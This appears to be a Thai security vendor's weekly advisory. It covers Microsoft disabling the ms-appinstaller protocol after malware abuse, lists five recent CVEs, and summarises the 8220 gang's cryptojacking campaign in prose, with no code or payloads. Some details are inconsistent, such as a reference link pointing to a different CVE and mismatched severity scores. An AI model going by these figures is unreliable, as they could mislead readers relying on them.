Subject : Microsoft Disables MSIX App Installer Protocol
Serverity : High (CVE-2021-43890) CVSS v3.0 Score : 7.1
Date : 30-12-2023 (Latest Update)
General Information
The ms-appinstaller protocol handler (AppX Installer) was introduced to enable users to seamlessly install an application by simply clicking a link on a website. Basically, this protocol handler provides a way for users to install Windows applications directly from a web server using an MSIX package or App Installer file without first downloading the installers to their computer.
News Description
Since November 2023, an expert team from Microsoft Threat Intelligence has observed activities of Threat Actors such as Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674, which are taking advantage of ms-appinstaller (Application installer) to distribute malware. After investigating the incident, Microsoft disabled the protocol handler. ms-appinstaller is the default.
The observed threat actor activity found that they were using ms-appinsataller protocol handler as an access vector for malware that may lead to ransomware distribution. Multiple cybercriminals are also selling a malware kit as a service for distributing signed malicious MSIX application packages using websites accessed through malicious advertisements for legitimate popular software.
Conclusion
Threat actors have likely chosen the ms-appinstaller protocol handler vector because it can bypass mechanisms designed to help keep users safe from malware, such as Microsoft Defender SmartScreen and built-in browser warnings for downloads of executable file formats.
Indicators of Compromise (IOCs)
The important things is Security systems. We must concern and monitor as usual.
For more information please contact
Email :sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
061 404 5895 (Ms.Thanyakan)
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
Reference Website
–https://thehackernews.com/2023/12/microsoft-disables-msix-app-installer.html
–https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web
–https://therecord.media/microsoft-disables-app-installation-protocol-abused-by-hackers
–https://www.thewindowsclub.com/ms-appinstaller-protocol-has-been-disabled
–https://nvd.nist.gov/vuln/detail/CVE-2021-43890
Weekly Interesting CVE
NO. |
CVE Name |
Published Date |
Last Update |
Device/Appplication/OS Target |
Attack Type |
CVSS |
Detail |
Solution |
Ref |
---|---|---|---|---|---|---|---|---|---|
1 |
CVE-2023-42017 |
22/12/2023 |
22/12/2023 |
IBM Planning Analytics |
Unrestricted upload |
7.8 |
IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. |
Upgrade versions |
|
2 |
CVE-2023-43585 |
13/12/2023 |
18/12/2023 |
Zoom Mobile App / Zoom SDKs |
Improper Access Control |
7.1 |
Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access. |
Upgrade versions |
https://www.zoom.com/en/trust/security-bulletin/ZSB-23058/ |
3 |
CVE-2023–7024 |
20/12/2023 |
20/12/2023 |
Google Web Browser version |
Heap-based overflow |
6 |
The high-severity zero-day vulnerability is due to a heap buffer overflow weakness in the open-source WebRTC framework many other web browsers, such as Mozilla Firefox, Safari, and Microsoft Edge, to provide Real-Time Communications (RTC) capabilities (e.g., video streaming, file sharing, and VoIP telephony) via JavaScript APIs. |
upgrade to Chrome version 120.0.6099.129/130 for Windows and 120.0.6099.129 for macOS and Linux |
|
4 |
CVE-2023-36033 |
21/12/2023 |
21/12/2023 |
windows 10 1809, 21h2, 22h2 |
Local Privilege Escalation |
7.8 |
An attacker can trigger this vulnerability to elevate privileges through the Windows Desktop Manager (DWM). An attacker can exploit the flaw to gain SYSTEM privileges and chaining this issue with a remote code execution bug can compromise a system. |
Update Patch |
https://securityaffairs.com/154175/security/microsoft-patch-tuesday-security-updates-nov-2023.html |
5 |
CVE-2023-36397 |
21/12/2023 |
21/12/2023 |
Windows 10 Version 160, 1809, 21H2, 22H2 |
Remote Code Execution |
8.9 |
Windows Pragmatic General Multicast (PGM) Remote Code Execution issue tracked as CVE-2023-36397. A remote, unauthenticated attacker can exploit this flaw to execute code with elevated privileges without user interaction. |
Update Patch |
https://nvd.nist.gov/vuln/detail/CVE-2023-6707
|
Malware News or Campaign IOC/IOA
No |
Campaign Name |
Detection in Thailand |
Detection Date |
Attack Type |
Severity |
Description |
Solution |
---|---|---|---|---|---|---|---|
1 |
Undocumented 8220 Gang Activities Exposed |
32 |
18/12/2023 |
Downloader, Tool, Remote Access Trojan (RAT), Vulnerability |
Low |
The 8220 gang, known for widespread deployment of evolving malware tactics, has been detected engaging in previously undocumented activity. This threat actor, believed to be of Chinese origin, targets both Windows and Linux web servers with cryptojacking malware. Exploiting various vulnerabilities, including CVE-2021-44228, CVE-2017-3506, and CVE-2020-14883, the 8220 gang uses different methods such as cURL, wget, lwp-download, python urllib, and a custom base64-encoded bash function to download second-phase files on Linux hosts. On Windows, a simple PowerShell WebClient command executes a downloaded PowerShell script. The group also employs a variation where Java code is executed without relying on an externally hosted XML file. These attacks have been observed across sectors such as healthcare, telecommunications, and financial services in the United States, South Africa, Spain, Colombia, and Mexico. |
1.Update your Antivirus to last versions. 2.Update Oracle WebLogic to Version 14.1.1 3.Create Policy Firewall to Block IoCs Network following Ref.1 |
Ref. https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/
04 January 2024
Viewed 434 time